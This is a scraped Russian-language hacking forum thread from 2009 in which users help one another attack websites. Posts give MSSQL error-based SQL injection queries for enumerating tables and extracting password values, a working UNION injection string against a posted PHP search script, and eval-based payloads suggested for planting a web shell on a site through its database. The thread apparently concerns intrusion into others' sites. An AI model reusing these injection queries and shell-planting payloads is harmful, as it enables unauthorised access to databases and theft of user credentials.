Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2zyat
    почитайте статьи про XSS
     
    4 people like this.
  2. Quiklys

    Quiklys New Member

    Joined:
    29 Sep 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Огромное спасибо!
    Все прокатило, только использовал без use а через:
    database..sysobjects
    database..syscolumns

    Сейчас стала проблема в том, что не перебираются колонки.
    SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')

    Я дописал

    SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users') AND name IN NOT ('userid')
    В ответ получаю:
    userid - первая колонка в таблице users

    Так-же не получилось вывести данные даже с этого поля userid
    Запрос имел вид:
    SELECT TOP 1 userid from [database]..[users]

    Ответ
    Если убрать кавычки то ответ меняется на:
    Попробовал загнать "users" в char - не получилось.
    просто для меня это загадка, которую ну никак не получается отгадать....Единственное что все-таки приходит в голову, это - не хватает прав. Хотя, если хватило на чтение database..sysobjects и database..syscolumns, то должно хватить прав и database.users...
     
  3. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    попробуй в hex закодировать, в твоём случае users будет 0x7573657273
     
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    надо писать не IN NOT
    а NOT IN

    2 min7 бред, это mssql
     
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Отписал в пм
    min7, во-первых, users это имя таблицы, а не строка, во-вторых 0x... в MSSQL работать не будет (нужны дополнительные конструкции на T-SQL)
     
  6. Quiklys

    Quiklys New Member

    Joined:
    29 Sep 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Огромное всем спасибо!
    После того как загнал в char userid, он начал просто отображаться.

     
    #9346 Quiklys, 18 Oct 2009
    Last edited: 18 Oct 2009
  7. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Code:
    $text=$_POST['text'];
    $tr=$_POST['tr'];
    $tr_text=$_POST['tr_text'];
    if (empty($text)){echo"<div class=cont1>Введите ключевое слово!<br/></div><div class=menu><a href=\"search.php\">Назад</a></div>"; 
    include "footer.php";
    exit;}
    if($tr_text==1){include_once "trans.php"; 
    $text=eng_to_rus($text);}
    
    //$text=strtolower($text);
    
    if($tr==1){
    $arr=mysql_query("select uid,site_name,link,info,cat from `users` where info like '%$text%' ;");
    }
    
    Возможно ли тут произвести SQL inj ?
    Меня просто вот это смущает :(
    Code:
    select uid,site_name,link,info,cat from `users` where info like '%$text%' ;
     
  8. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    Ну просто в поле tr_text вводи 0 в tr вводим 1, а в text нашу скулю...
     
    1 person likes this.
  9. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    А как с LIKE быть?
    Пытаюсь подставит ' не выводит ни какой ошибки, т.е. производится поиск ковычки в БД.
    Пытался так
    Code:
    'union+select+1--
    
    и т.д.
    Чёт вообще мозг отказывается работать :mad:
     
  10. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    пости в $_POST['text'] - %
    и про $_POST['tr'] не забудь так как без него запрос не выполнится.
     
    2 people like this.
  11. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    .php?tr=1&text=%' and info = -1 union select 1,2,3,4,5--+

    ЗЫ l1ght, я знаю что постом) есть плагины которые позволяют из строки браузера отправлять постом
     
    #9351 .Slip, 18 Oct 2009
    Last edited: 18 Oct 2009
    2 people like this.
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет, почти повторяюсь. Растолкую поточнее

    Есть 2 сервера (2 разные машины)
    1 с сайтом
    2 с БД

    Есть доступ к БД
    А сайт использует эту БД
    Задача залить шелл на сайт через БД

    Если допустим в БД заношу <? eval(echo 1;); ?> то на сайте так и выводит, не обрабатывая
    На сайте знаю полный путь.
     
  13. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Очень извеняюсь что не по теме, но я хочу поучиться искать уязвимости во всяких кмс и движках. Нужен совет какой двиг начать ковырять?) знаю что звучит глупо, но надеюсь что ктото посоветует=)
     
  14. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Скорей всего там на подобие этого
    Code:
    $sql=mysql_query("select * from `adad`");
    echo "$sql";
    
    Т.е. получается вот так
    Code:
    echo "<?php eval()?>";
    Попробуй поиграй с ковычками...
    PS: я не эксперт, могу ошибится
     
    #9354 SeNaP, 18 Oct 2009
    Last edited: 18 Oct 2009
    1 person likes this.
  15. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    если там так как описал SeNaP,то пробуй:

    ".eval('echo 123;')."
     
    1 person likes this.
  16. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    http://ru.wikipedia.org/wiki/%D0%A1%D0%BF%D0%B8%D1%81%D0%BE%D0%BA_CMS
    cmslist.ru
     
  17. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    Byrger хотя вряд ли там такое :
    Code:
    echo "<?php eval()?>";
    может быть ,по моему только камикадзе будет так выводить текст ,который с вероятностью 70%(дело вкуса) будет содержать ".
    Скорей всего там стоит htmlspecialchars(); или тому подобные функции.
    Возьми ка найди в сорсе страницы ту часть где ты постил:
    Code:
    <? eval(echo 1;) ?> 
    если там будет ,что то типа:
    Code:
    &lt;? eval(echo 1;) ?&gt;
    залей холодной водой.
     
  18. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Нет там htmlspecialchars
     
    1 person likes this.
  19. Quiklys

    Quiklys New Member

    Joined:
    29 Sep 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Столкнулся с проблемой - не удается получить числовое значение строки.
    Из-за того что значение строки целое число(например, 1234567), то используя обыкновенную конструкцию SELECT TOP 1 password FROM - вытянуть ничего не получилось. В ответ дефолтная страница без скуля.
    Нашел, что это решается методом добавление чего-либо к числовым данным, перед этим переведенных в integer. Имеем такую конструкцию.
    SELECT TOP 1 convert(int, password%2b'test') FROM
    где в итоге, наш пароль должет отобразится как "1234567 test"

    Увы, заюзать - не получилось. В ответ получаю ошибку
    База mssql 2005.
    Друзья, очень прошу подсказать как с этим бороться! Спасибо!
     
  20. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Ты уверен что это Mssql а не Access? И покажи полностью как скулю вводишь.
     
    1 person likes this.
Thread Status:
Not open for further replies.